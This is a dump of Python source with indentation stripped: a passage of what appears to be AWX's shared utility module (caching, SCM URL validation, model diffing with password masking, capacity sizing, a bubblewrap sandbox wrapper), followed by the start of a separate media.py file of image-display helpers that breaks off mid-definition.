raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
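# Editor's note: a minimal usage sketch for memoize()/memoize_delete(). The
# function name and ttl are hypothetical, and a configured Django cache backend
# is assumed; nothing here executes at import time.
def _example_memoize_usage():
    @memoize(ttl=30, track_function=True)
    def expensive_lookup(pk):
        return {'pk': pk}          # stand-in for a slow computation or query

    first = expensive_lookup(1)    # computed, then stored under the slugified function name
    second = expensive_lookup(1)   # served from the per-function cache dict
    memoize_delete('expensive_lookup')  # drops the whole cache bucket for that function
    return first, second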
def _get_ansible_version(ansible_path):
'''
Return Ansible version installed.
Ansible path needs to be provided to account for custom virtual environments
'''
try:
proc = subprocess.Popen([ansible_path, '--version'],
stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
@memoize()
def get_ansible_version():
return _get_ansible_version('ansible')
@memoize()
def get_ssh_version():
'''
Return SSH version installed.
'''
try:
proc = subprocess.Popen(['ssh', '-V'],
stderr=subprocess.PIPE)
result = smart_str(proc.communicate()[1])
return result.split(" ")[0].split("_")[1]
except Exception:
return 'unknown'
def get_awx_version():
'''
Return AWX version as reported by setuptools.
'''
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
class StubLicense(object):
features = {
'activity_streams': True,
'ha': True,
'ldap': True,
'multiple_organizations': True,
'surveys': True,
'system_tracking': True,
'rebranding': True,
'enterprise_auth': True,
'workflows': True,
}
def validate(self):
return dict(license_key='OPEN',
valid_key=True,
compliant=True,
features=self.features,
license_type='open')
def get_licenser(*args, **kwargs):
try:
from tower_license import TowerLicense
return TowerLicense(*args, **kwargs)
except ImportError:
return StubLicense(*args, **kwargs)
def update_scm_url(scm_type, url, username=True, password=True,
check_special_cases=True, scp_format=False):
'''
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
'''
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# hg: http://www.selenic.com/mercurial/hg.1.html#url-paths
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'hg', 'svn', 'insights'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
#if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
#if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git and hg.
elif scm_type in ('git', 'hg'):
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'hg': ('http', 'https', 'ssh', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https')
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
#raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
special_hg_hosts = ('bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'hg' and parts.scheme == 'ssh' and parts.hostname in special_hg_hosts and netloc_username != 'hg':
raise ValueError(_('Username must be "hg" for SSH access to %s.') % parts.hostname)
if scm_type == 'hg' and parts.scheme == 'ssh' and netloc_password:
#raise ValueError('Password not supported for SSH with Mercurial.')
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type != "insights":
netloc = u':'.join([urllib.parse.quote(x,safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path,
parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
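# Editor's note: illustrative round-trip for SCP-style git URLs (a sketch, not
# part of the original module; the repository URL is hypothetical). With
# scp_format=True the URL is parsed via the internal git+ssh scheme and
# converted back to SCP form on the way out.
def _example_update_scm_url():
    url = 'git@github.com:ansible/awx.git'
    assert update_scm_url('git', url, scp_format=True) == url
    # Replacing the username is rejected for github SSH access (it must stay "git").
    try:
        update_scm_url('git', url, username='someone', scp_format=True)
    except ValueError:
        pass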
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {
'user': ['last_login'],
'oauth2accesstoken': ['last_used'],
'oauth2application': ['client_secret']
}
field_blacklist = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(obj._meta.model_name, [])
if field_blacklist:
allowed_fields = [f for f in allowed_fields if f not in field_blacklist]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (
isinstance(field_val, str) and
field_val.startswith('$encrypted$')
):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
from django.db.models import Model
if not(old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not(new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
'''
Creates a new unsaved object of type Class2 using the fields from obj1;
values in kwargs can override obj1.
'''
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
'''
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 to field of same name, if field occurs in `fields`
'''
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
'''
Return type name for a given model class.
'''
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
'''
Return model class for a given type name.
'''
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
'''
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
'''
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(Q(
Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) |
Q(**{'%s__isnull' % res_path: True})))
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
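# Editor's note: illustrative call shape only (the model, page and user are
# hypothetical; this mirrors the docstring above rather than adding behaviour):
#   caps = prefetch_page_capabilities(
#       JobTemplate,                        # model exposing accessible_pk_qs()
#       page,                               # the page of JobTemplate objects
#       ['admin', 'execute',                # -> 'edit' and 'start' capabilities
#        {'copy': ['inventory.admin', 'project.admin']}],
#       request.user)
#   # caps -> {obj.pk: {'edit': bool, 'start': bool, 'copy': bool}, ...}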
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(
_('Input type `{data_type}` is not a dictionary').format(
data_type=data_type)
)
def parse_yaml_or_json(vars_str, silent_failure=True):
'''
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, or re-raise a combined error if `silent_failure` is False.
'''
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_(
'Variables not compatible with JSON standard (error: {json_error})').format(
json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(_(
'Cannot parse as JSON (error: {json_error}) or '
'YAML (error: {yaml_error}).').format(
json_error=str(json_err), yaml_error=str(yaml_err)))
return vars_dict
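# Editor's note: a small sketch of the JSON-first, YAML-fallback behaviour
# above (inputs are illustrative; nothing executes at import time).
def _example_parse_yaml_or_json():
    assert parse_yaml_or_json('{"limit": "webservers"}') == {'limit': 'webservers'}
    assert parse_yaml_or_json('limit: webservers') == {'limit': 'webservers'}
    assert parse_yaml_or_json('not: [valid') == {}   # unparseable input fails silently
    assert parse_yaml_or_json('---') == {}           # empty YAML document becomes {}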
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
'''
Measure system CPU and memory and use them as a baseline for determining the system's task capacity
'''
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
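# Editor's note: worked example of the capacity formula above, with
# hypothetical numbers (cpu capacity 16 forks, memory capacity 30 forks):
#   scale=Decimal(1.0) -> 16 + (30 - 16) * 1.0 = 30  (trust the larger bound)
#   scale=Decimal(0.5) -> 16 + (30 - 16) * 0.5 = 23
#   scale=Decimal(0)   -> 16                         (conservative: smaller bound)
# e.g. get_system_task_capacity(Decimal('0.5'), cpu_capacity=16, mem_capacity=30) == 23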
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
'''
Context manager to ignore updating inventory computed fields.
'''
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times.
"""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
'''
Context manager to ignore moving groups/hosts when group is deleted.
'''
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
'''
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
'''
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
@memoize()
def check_proot_installed():
'''
Check that proot is installed.
'''
from django.conf import settings
cmd = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
logger.exception('bwrap unavailable for unexpected reason.')
return False
def build_proot_temp_dir():
'''
Create a temporary directory for proot to use.
'''
from django.conf import settings
path = tempfile.mkdtemp(prefix='awx_proot_', dir=settings.AWX_PROOT_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
return path
def wrap_args_with_proot(args, cwd, **kwargs):
'''
Wrap existing command line with proot to restrict access to:
- AWX_PROOT_BASE_PATH (generally, /tmp) (except for own /tmp files)
For non-isolated nodes:
- /etc/tower (to prevent obtaining db info or secret key)
- /var/lib/awx (except for current project)
- /var/log/tower
- /var/log/supervisor
'''
from django.conf import settings
cwd = os.path.realpath(cwd)
new_args = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--unshare-pid', '--dev-bind', '/', '/', '--proc', '/proc']
hide_paths = [settings.AWX_PROOT_BASE_PATH]
if not kwargs.get('isolated'):
hide_paths.extend(['/etc/tower', '/var/lib/awx', '/var/log', '/etc/ssh',
settings.PROJECTS_ROOT, settings.JOBOUTPUT_ROOT])
hide_paths.extend(getattr(settings, 'AWX_PROOT_HIDE_PATHS', None) or [])
for path in sorted(set(hide_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
if os.path.isdir(path):
new_path = tempfile.mkdtemp(dir=kwargs['proot_temp_dir'])
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
else:
handle, new_path = tempfile.mkstemp(dir=kwargs['proot_temp_dir'])
os.close(handle)
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR)
new_args.extend(['--bind', '%s' %(new_path,), '%s' % (path,)])
if kwargs.get('isolated'):
show_paths = [kwargs['private_data_dir']]
elif 'private_data_dir' in kwargs:
show_paths = [cwd, kwargs['private_data_dir']]
else:
show_paths = [cwd]
for venv in (
settings.ANSIBLE_VENV_PATH,
settings.AWX_VENV_PATH,
kwargs.get('proot_custom_virtualenv')
):
if venv:
new_args.extend(['--ro-bind', venv, venv])
show_paths.extend(getattr(settings, 'AWX_PROOT_SHOW_PATHS', None) or [])
show_paths.extend(kwargs.get('proot_show_paths', []))
for path in sorted(set(show_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
new_args.extend(['--bind', '%s' % (path,), '%s' % (path,)])
if kwargs.get('isolated'):
if '/bin/ansible-playbook' in ' '.join(args):
# playbook runs should cwd to the SCM checkout dir
new_args.extend(['--chdir', os.path.join(kwargs['private_data_dir'], 'project')])
else:
# ad-hoc runs should cwd to the root of the private data dir
new_args.extend(['--chdir', kwargs['private_data_dir']])
else:
new_args.extend(['--chdir', cwd])
new_args.extend(args)
return new_args
def get_pk_from_dict(_dict, key):
'''
Helper for obtaining a pk from user data dict or None if not present.
'''
try:
val = _dict[key]
if hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices(custom_paths=None):
from django.conf import settings
custom_paths = custom_paths or settings.CUSTOM_VENV_PATHS
all_venv_paths = [settings.BASE_VENV_PATH] + custom_paths
custom_venv_choices = []
for custom_venv_path in all_venv_paths:
if os.path.exists(custom_venv_path):
custom_venv_choices.extend([
os.path.join(custom_venv_path, x, '')
for x in os.listdir(custom_venv_path)
if x != 'awx' and
os.path.isdir(os.path.join(custom_venv_path, x)) and
os.path.exists(os.path.join(custom_venv_path, x, 'bin', 'activate'))
])
return custom_venv_choices
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email',
'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None),
'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or
getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(
target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)
).start()
return path
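# Editor's note: minimal sketch of consuming the fifo created above (POSIX
# only, since os.mkfifo is used; the payload is illustrative).
def _example_create_temporary_fifo():
    path = create_temporary_fifo(b'secret-material\n')
    with open(path, 'rb') as f:    # the writer thread unblocks once a reader opens the pipe
        data = f.read()
    return data                    # -> b'secret-material\n'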
|
media.py
|
from PIL import Image
from typing import List
from machin.parallel import get_context
import os
import numpy as np
import moviepy.editor as mpy
import matplotlib.pyplot as plt
def show_image(
image: np.ndarray,
show_normalized: bool = True,
pause_time: float = 0.01,
title: str = "",
):
"""
Use matplotlib to show a single image. You may repeatedly call this method
with the same ``title`` argument to show a video or a dynamically changing
image.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with ``dtype``
= any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
show_normalized: Show normalized image alongside the original one.
pause_time: Pause time between displaying current image and the next
one.
title: Title of the display window.
"""
if np.issubdtype(image.dtype, np.integer):
image = image.astype(np.float64) / 255
fig = plt.figure(title, clear=True)
fig.canvas.manager.set_window_title(title)
if show_normalized:
ax = fig.add_subplot(121)
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
ax2 = fig.add_subplot(122)
ax2.set_facecolor((0.0, 0.0, 0.0))
pix_range = (np.max(image) - np.min(image)) + 1e-6
ax2.imshow((image - np.min(image)) / pix_range, vmin=0, vmax=1)
plt.pause(pause_time)
else:
ax = fig.add_subplot(111)
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
plt.pause(pause_time)
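# Editor's note: tiny usage sketch for show_image (values are illustrative,
# an interactive matplotlib backend is assumed, and nothing runs on import).
def _example_show_image():
    noise = np.random.rand(64, 64, 3)     # float image in [0, 1]
    for _ in range(10):                   # reuse the same title to animate
        show_image(noise, show_normalized=False, pause_time=0.05, title="demo")
        noise = np.clip(noise + np.random.normal(0, 0.05, noise.shape), 0, 1)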
def create_video(
frames: List[np.ndarray],
path: str,
